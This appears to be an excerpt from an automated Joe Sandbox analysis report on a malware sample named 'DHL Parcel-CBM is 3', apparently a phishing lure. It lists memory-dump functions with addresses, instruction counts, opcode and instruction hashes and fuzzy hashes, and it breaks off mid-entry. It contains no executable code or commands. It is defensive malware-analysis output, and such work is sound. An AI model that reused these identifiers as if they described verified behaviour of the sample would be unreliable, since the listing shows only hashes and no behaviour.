Opcode Fuzzy Hash: e528df6bc99bb9467ed4de5f11d3b5845761aa8250f69e43b64c32c7137719d9
Instruction Fuzzy Hash: 6112EB34A002198FCB94EFA4C994A9DB7B2BF89310F5185A8D54AAB355DF70ED85CF80

Function 0675BAB8 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98898f212908e5d62cccd8459d74855745f35c8f265098578980d23dca3baa5
Instruction ID: c8f3fd8c38e1dea58ead18378892ca21926f682821ae778fb55e7caf134cb786
Opcode Fuzzy Hash: e98898f212908e5d62cccd8459d74855745f35c8f265098578980d23dca3baa5
Instruction Fuzzy Hash: 35A1AE35A012148FCB45DF64D4A4ABDBBF2EF88710F2584AAE911EB391CBB5DD41CB90

Function 065C4358 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a17307c2fc8febc7f1460262c605cded4f9e7336f8a6a685048862205dd4df
Instruction ID: da8c1160ff70295d505aae69022292f5882e844e40fd267bdae2e2c5b423971d
Opcode Fuzzy Hash: 17a17307c2fc8febc7f1460262c605cded4f9e7336f8a6a685048862205dd4df
Instruction Fuzzy Hash: 3DA10A34A002198FDB54DF64C994BADB7B2BF89310F5485A8D54AAB391DF70ED85CF40

Function 065E5889 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8865afb4fd46d03de7aff4914aa0bf443609d1d61b0cf14f38acf78d92d317
Instruction ID: 54527e73104ec2ed97d0f7a07766b059da6702d3228eec6aa91a5e75c5153cd6
Opcode Fuzzy Hash: 1c8865afb4fd46d03de7aff4914aa0bf443609d1d61b0cf14f38acf78d92d317
Instruction Fuzzy Hash: D5B1A0B4D16228CFDB64CFA5C948BDCBBF1BB49309F248099D509AB345D3759A88CF80

Function 065C5310 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7bb9544de9254d4d9f67ce51ec78dea65e90cd50c768b7f1071d64d65440e37
Instruction ID: 81336f4dc343966f119e0b3e267759db9037271aab2f879ff97dd6e3bb885643
Opcode Fuzzy Hash: b7bb9544de9254d4d9f67ce51ec78dea65e90cd50c768b7f1071d64d65440e37
Instruction Fuzzy Hash: BA813C34B10214DFCB84DFA8D894A6EB7B6FF89710F1441A9E5069B3A1DB75EC41CB90

Function 069EA948 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0787824693f5c25a5933ee7bbae7e98d8a88c029002f4b7b6980a3df676ad077
Instruction ID: 1194ce4f3cb1bc52c6c4d3496163a227313c563681c0f7b158362e3daf6af70e
Opcode Fuzzy Hash: 0787824693f5c25a5933ee7bbae7e98d8a88c029002f4b7b6980a3df676ad077
Instruction Fuzzy Hash: 27A11974E01208CFDB95DFA8D8846AEBBB6FB89300F20806AD555AB355EB385D45CF81

Function 065CD550 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332fd76727ca88e829b0219d30db3410c0bb45305ca65c2533f6f14bc678dfc5
Instruction ID: faf2d6a29c271a6a03e26df6dcc2c456c63f99d35457f3a310bd27c670d9c820
Opcode Fuzzy Hash: 332fd76727ca88e829b0219d30db3410c0bb45305ca65c2533f6f14bc678dfc5
Instruction Fuzzy Hash: 2A911B74D00218CFEB94DFA4D894BADBBF1FF49314F1081AAD409AB291DB789A85DF11

Function 065C5300 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee889103ee00f5947dc3a1f5e3bc6197b5aa1f6e47e0d04343cf2a3de6dec41
Instruction ID: 8a5eb8d7a76c566162fc38579f65a45e11391b6a03eafdd6bfc0522ecb8973e9
Opcode Fuzzy Hash: eee889103ee00f5947dc3a1f5e3bc6197b5aa1f6e47e0d04343cf2a3de6dec41
Instruction Fuzzy Hash: 27611834B10614DFCB84DFA8D894AAEB7B6FF88710F148169E5169B3A1DB71EC41CB90

Function 065EDD0D Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc4699ce0fcca176febdc3041b65127715cda3e14a5c70360fc8fd7eeed1d7e
Instruction ID: eb2d912f7ea435aa10a170ca5b5c1412252636c671c7d56a74a1ef081e37caab
Opcode Fuzzy Hash: dbc4699ce0fcca176febdc3041b65127715cda3e14a5c70360fc8fd7eeed1d7e
Instruction Fuzzy Hash: 37614C70E15219CFEFA8CFA9C485BADBBF2BF49300F108569D009AB255DBB58985CF40

Function 065C0040 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f96ee2db94ca6a3a64d0a480b8abb7a86f49ea1a22f8cc659b54f20c848e35
Instruction ID: 5934577dec07dd1c3f81576fd892841dfc3d00555f6d0cf9cb28a15939bcf7ee
Opcode Fuzzy Hash: 98f96ee2db94ca6a3a64d0a480b8abb7a86f49ea1a22f8cc659b54f20c848e35
Instruction Fuzzy Hash: 4B514E34B00609DFCB44EF64E898AAEB7B6FF88711F008119E5069B3A4DF749946DF81

Function 069E2662 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efdf592ef59eb3fc17e8865099f5e8e9b72d720555f3b5d59ce3ae5f04516423
Instruction ID: c78bf0e28d84c51249792ee6350999c44940d2d4f4cdebf5657b1b43d0224e74
Opcode Fuzzy Hash: efdf592ef59eb3fc17e8865099f5e8e9b72d720555f3b5d59ce3ae5f04516423
Instruction Fuzzy Hash: 99614974A04218CFDBA1DF68D8947DEBBB6FB89300F2080A9D549A7745DB385E81DF42

Function 065C0D88 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad48e7d3acbe6affdcdcd26cbd615b3db1607a4a9798ab2970b5e29aac26d363
Instruction ID: 0127947fb6c8129630de80dec2ddfecaf145ca784c9a6b98b79cd6111c429c40
Opcode Fuzzy Hash: ad48e7d3acbe6affdcdcd26cbd615b3db1607a4a9798ab2970b5e29aac26d363
Instruction Fuzzy Hash: FE312731744254CFC7159FA8E84096BBBE9EF81320B1584BEE10DCB292DB31EC46CBA0

Function 065C8208 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e386797e018b21f355baa8c18e7a869135c1952b6450ef230a5e58f697a9cd1a
Instruction ID: 5dc1607942c1c73cfc8517a19045754594893763b715d51069842dd167c269df
Opcode Fuzzy Hash: e386797e018b21f355baa8c18e7a869135c1952b6450ef230a5e58f697a9cd1a
Instruction Fuzzy Hash: DB41B271F00B148FCBA4DBB8D96425EBBF1FF85660B04896ED15AD7A50DB30E941CB81

Function 027B0B41 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f42336263e6cc4868b06dccbe2645164fe72b764a38d8aa17374a2170fff10e
Instruction ID: dbe7027e0ad8dd2ad2046040639ddd492df227702e30330d86dae7bb2d7ceecf
Opcode Fuzzy Hash: 5f42336263e6cc4868b06dccbe2645164fe72b764a38d8aa17374a2170fff10e
Instruction Fuzzy Hash: 2E41B071A052459FDB12CF79C980ADEFBF2FF88300B14856AE455EB291DB30AD45CB90

Function 027B38C0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd02a4f4098a67691936ca33208b86036f4562880d754412d1b1f97c5b719982
Instruction ID: 6cb861bb1fb341e200773cda807f7416b59ea194b21dc145a6a8e679119bd293
Opcode Fuzzy Hash: dd02a4f4098a67691936ca33208b86036f4562880d754412d1b1f97c5b719982
Instruction Fuzzy Hash: DE511774A04209DFCB11DF69C484AAAF7F1FF88310F1085AAE95AAB350D731E991CF91

Function 027B3D20 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db240c912010d4d6bba98bea5f11a1e7b0fc54f1674facb77e9c103ced89adc7
Instruction ID: 46dd9d9560005c674bb438dbf36fb7e9ff05eb0a21cff17ee15bc2840e8ab57f
Opcode Fuzzy Hash: db240c912010d4d6bba98bea5f11a1e7b0fc54f1674facb77e9c103ced89adc7
Instruction Fuzzy Hash: 68415F34A04249DFCB16DF6AD884BFABBB2FF89300F1445AAE515AB251C730D881CF91

Function 065C877F Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1856ae63ca06cb33a783a417b372a8ac3d5a732fc0e203dafd8d2fede0ff5ead
Instruction ID: 736b9e158f1c3bf40714b6a58f46fdc895afc1ba67404431e9aa2614c09b4c33
Opcode Fuzzy Hash: 1856ae63ca06cb33a783a417b372a8ac3d5a732fc0e203dafd8d2fede0ff5ead
Instruction Fuzzy Hash: F941E330B05214AFCB259F68D814BAEBBB6FF85710F10455EE656EB290DB30A905CB91

Function 065C8638 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8269889a4ba59e0f40574df2d6efdaf86c1d006a9708b35ca3908703e8171bd
Instruction ID: 26ccc43db24a2978d8465bb22f6b04fcbda4c943e302945a1393064348ca497e
Opcode Fuzzy Hash: b8269889a4ba59e0f40574df2d6efdaf86c1d006a9708b35ca3908703e8171bd
Instruction Fuzzy Hash: 32419875A00B848FCB60CFA9C944A6ABBF2BF98310F18895DD58697A50D731F944CFA1

Function 065EE620 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6abf078ffde6380f80773a17cf454dd247ed7f69cb1c751c52f6c5db8c95589
Instruction ID: fdd6fa47e79fa0f5c950a0003ed8d4e99cdb6c10223c43ec3ace2fabf1b7efec
Opcode Fuzzy Hash: f6abf078ffde6380f80773a17cf454dd247ed7f69cb1c751c52f6c5db8c95589
Instruction Fuzzy Hash: 2751D574E11218DFDB58DFB9D585A9DBBF2BF88304F20912AE405AB365DB319941CF40

Function 027B34A8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c80db4f5e5a4f0b0c792b056a42fe44ec6692d58b4d422b2acff01ac3f2d872
Instruction ID: ca79e4e8074d04be0c304471fab20110ebf8582ea464915003ef04b266ce80f7
Opcode Fuzzy Hash: 0c80db4f5e5a4f0b0c792b056a42fe44ec6692d58b4d422b2acff01ac3f2d872
Instruction Fuzzy Hash: D6418031E04219CFCB02DFA8C890BEEBBB2FF49300F5585AAD509B7251D731A985CB51

Function 065EE611 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e1c55e12795cbb1f11dab60a78c8e10d4173c62c724ef6bddb7b9f4ea8087f
Instruction ID: 6d27be15adcba92be2448220bd566f4b914de9d3d3c8f561604dcae68517208c
Opcode Fuzzy Hash: f4e1c55e12795cbb1f11dab60a78c8e10d4173c62c724ef6bddb7b9f4ea8087f
Instruction Fuzzy Hash: 234105B0E01208DFDB58DFB9D954ADDBBB2BF89300F20912AE409AB261DB319941CF40

Function 069E5167 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13954e4ce463f0b00ff769d7f39386603c9aaea8f5bf9963dfd2d7cbd372280
Instruction ID: 372d95a66fb8988f48ffe285c0c93b2c40feb4de07abf951559ea5f5a033b873
Opcode Fuzzy Hash: b13954e4ce463f0b00ff769d7f39386603c9aaea8f5bf9963dfd2d7cbd372280
Instruction Fuzzy Hash: CC510474A00218CFDB94EFA8D894B9EBBB6FB89304F1080A9E549EB355DB345D80DF41

Function 065C2C30 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2755aaa94f886d8895a0ab34b758df543e59db99af504d67d3f5ba23066b18
Instruction ID: 08e6d6eaa9b32bc1cec8cf8d877f99a6899009fd34a60060f93557e2320b2123
Opcode Fuzzy Hash: 1e2755aaa94f886d8895a0ab34b758df543e59db99af504d67d3f5ba23066b18
Instruction Fuzzy Hash: 0F31D836610104EFCB45DF98D888E99BBB2FF48320F1580A8EA099B372C775ED55DB40

Function 069E1A02 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee8390e2f06e2f2f03d5b310b2e7e080c58d70afc8999933ea049eb9635732b
Instruction ID: b181f0aebe19829a105ff5bbcc9e0888b2820ed1ea4c8069e9f292bf41f975c7
Opcode Fuzzy Hash: 2ee8390e2f06e2f2f03d5b310b2e7e080c58d70afc8999933ea049eb9635732b
Instruction Fuzzy Hash: 7A513B74A00228CFDB94EF28D895B9AB7B6FB8D300F5080E9E5099B345DB345E85DF42

Function 0675C368 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecc213a047efea526e4bd637456955130dd0e21e83f5c3b4f6caae5ca69bb8c
Instruction ID: 734bdb566fc79f08e41c9cb353829081004c074bd3a39e7e2d3b2e3a0def800a
Opcode Fuzzy Hash: 5ecc213a047efea526e4bd637456955130dd0e21e83f5c3b4f6caae5ca69bb8c
Instruction Fuzzy Hash: 3D419A30A003198FDB55DF65C944BBEBBB1FF88340F01846ADA05E7261D7B49945CB91

Function 065C4A50 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30ef340aceb5911f3b76fbc611b8e5cad0fd08b9c3c9be5696d9044c717149e
Instruction ID: a5ebf0fad07764b18dd51f68bc49b46aea5cf63d557118ec2eeb87f292e5d387
Opcode Fuzzy Hash: b30ef340aceb5911f3b76fbc611b8e5cad0fd08b9c3c9be5696d9044c717149e
Instruction Fuzzy Hash: 53417E70A002168FCB51DFA8C990A6EBBF2FF84314B15C9ADD4099B256D770F985CBA0

Function 06757F78 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db037f3fdbbf54eb621447e849d221fd6c44e3c5b2e925c191b0dde43533355c
Instruction ID: 8b25e600dab4de6b97dcb5ec4e7ab3a3393993b29793dc803035794f7b2a4124
Opcode Fuzzy Hash: db037f3fdbbf54eb621447e849d221fd6c44e3c5b2e925c191b0dde43533355c
Instruction Fuzzy Hash: 3B3137B0E002089FCB45DFA9D840ADEBBF6EB8D310F1180A5E915A7354DB349E05CFA1

Function 06757E20 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b5ff3eeb88921146f73f49c5a273bb903967e40738ffcbdf2123ec94d286e0
Instruction ID: 2471c01986513868754b006860f7990a763b85002a22cd95dac2d37a634c628c
Opcode Fuzzy Hash: f5b5ff3eeb88921146f73f49c5a273bb903967e40738ffcbdf2123ec94d286e0
Instruction Fuzzy Hash: 3F3137B4E042089FDB48DFAAD8406EEBBF6AB8D300F11C066E914A7355D7789A41CF91

Function 027B2288 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2265629a47429092966a74e7415b38e88dc2566d289ba209c52387f4c1baad1
Instruction ID: 006676eb125ccfb799e402fdcdeb0e1f39a19dc8e246e9d60a9638e7dc42be55
Opcode Fuzzy Hash: a2265629a47429092966a74e7415b38e88dc2566d289ba209c52387f4c1baad1
Instruction Fuzzy Hash: C021F132B0E3419FE7238A789C883EB6AD5EF45358F05053AEC46D3693E761D881C351

Function 069E8F4F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80a090f6cb146622d831c0b57a8c981a7653d34df8417699788737cb020f33c
Instruction ID: 8191e1514579cd1087ad70031c0c8d5a3675cf148dad188f3393cb02f9a0e43a
Opcode Fuzzy Hash: e80a090f6cb146622d831c0b57a8c981a7653d34df8417699788737cb020f33c
Instruction Fuzzy Hash: A841AEB5D012288FEBA1DF54C990BD9B7F1BB4A304F5481EAD649A7240EB746F84CF90

Function 06756A11 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f227c4b442455b15f8b87e9c932732a714a28945610c9ac0de08d2d95e617d0
Instruction ID: 6f9dffe845dccaa6a1bb5d85f5a1b452a2ae11af182105e3c78e1eb1b163f842
Opcode Fuzzy Hash: 0f227c4b442455b15f8b87e9c932732a714a28945610c9ac0de08d2d95e617d0
Instruction Fuzzy Hash: D3313770E04219CFDB84DFA9D844AEEBBF6BF49300F61C1AAE914A3261D7B55940CF90

Function 027B1F61 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3655a338c25550b894452a3d1f6bd7c7ef52d966ab08f5f92858979c53d3f30
Instruction ID: 1906385e6c71ffb67bff50bd5b4c25d62fc029e801d41abbb13f6ee759bf827e
Opcode Fuzzy Hash: a3655a338c25550b894452a3d1f6bd7c7ef52d966ab08f5f92858979c53d3f30
Instruction Fuzzy Hash: 6B21A031B051058FDB1AEA609914BFF3765EF89380B54C529D8099B25EEB348941CB81

Function 0675771B Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6192a07baae7d5906cfb8cb2ceb80aa9f17f5b6d99f011b3fa998c0490811139
Instruction ID: fac6a145389b3e38d8f0ac2658c2ccb60bb0d9bd28cbc4e82fb14083bea40964
Opcode Fuzzy Hash: 6192a07baae7d5906cfb8cb2ceb80aa9f17f5b6d99f011b3fa998c0490811139
Instruction Fuzzy Hash: 41413870E05218CFEBA8DF69D844BADB7F6FB88300F21C4A9D409A7245D7B99885CF41

Function 06756A47 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7240bd296f54d7f332327041065738ddd37321c2cb71d1c86fdb17dfaadc004
Instruction ID: 96ba8459ff3ad9446935c1691b5e2b1a88fc288d85254c1cb4d326afdb9c5867
Opcode Fuzzy Hash: e7240bd296f54d7f332327041065738ddd37321c2cb71d1c86fdb17dfaadc004
Instruction Fuzzy Hash: 21315770E01219CFDB44DFA9D844AEEBBF2BF48300F21D5AAE814A7261D7B45A44CF90

Function 06757E30 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505d309e52be0c1f55a29acf9217b973d9315db0a28b3efb241a3f898cd5c16b
Instruction ID: 9878f3faa49b49c66b1f4baf3f813bd0a8f3836aa5b9836bf1b4b0317e0c82e7
Opcode Fuzzy Hash: 505d309e52be0c1f55a29acf9217b973d9315db0a28b3efb241a3f898cd5c16b
Instruction Fuzzy Hash: 7B3105B0E042088FDB48DFAAD8406EEBBF6EB8C310F11C065E915A7355DB749A41CF90

Function 067568A8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945a0162a79d110c9158dcdd4afba385d83018ee11e3add533b2bd571d449c47
Instruction ID: 5a2eaa19be1f06477282cd8aee76ec02c4f59fba935fc5cfd6080ae0900737b3
Opcode Fuzzy Hash: 945a0162a79d110c9158dcdd4afba385d83018ee11e3add533b2bd571d449c47
Instruction Fuzzy Hash: C33106B4D05208DFDB84DFA9C8446EEBBF1BF49310F61C0AAD819A7260D7785A41CF91

Function 065C5617 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68b8abf932ca8feba28430e01d3d395a0911d131147d9a36b1ce39e741b6ca2f
Instruction ID: 32a2d9666b2b442d25c6582b22b5466d6fe2b7668d1de803b98bfbdc19a6e34f
Opcode Fuzzy Hash: 68b8abf932ca8feba28430e01d3d395a0911d131147d9a36b1ce39e741b6ca2f
Instruction Fuzzy Hash: A0313C35A00118DFCB44DFA4DC55AEEB7B6FF88320F148029E915BB3A0DA35AD51CBA0

Function 027B664F Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin
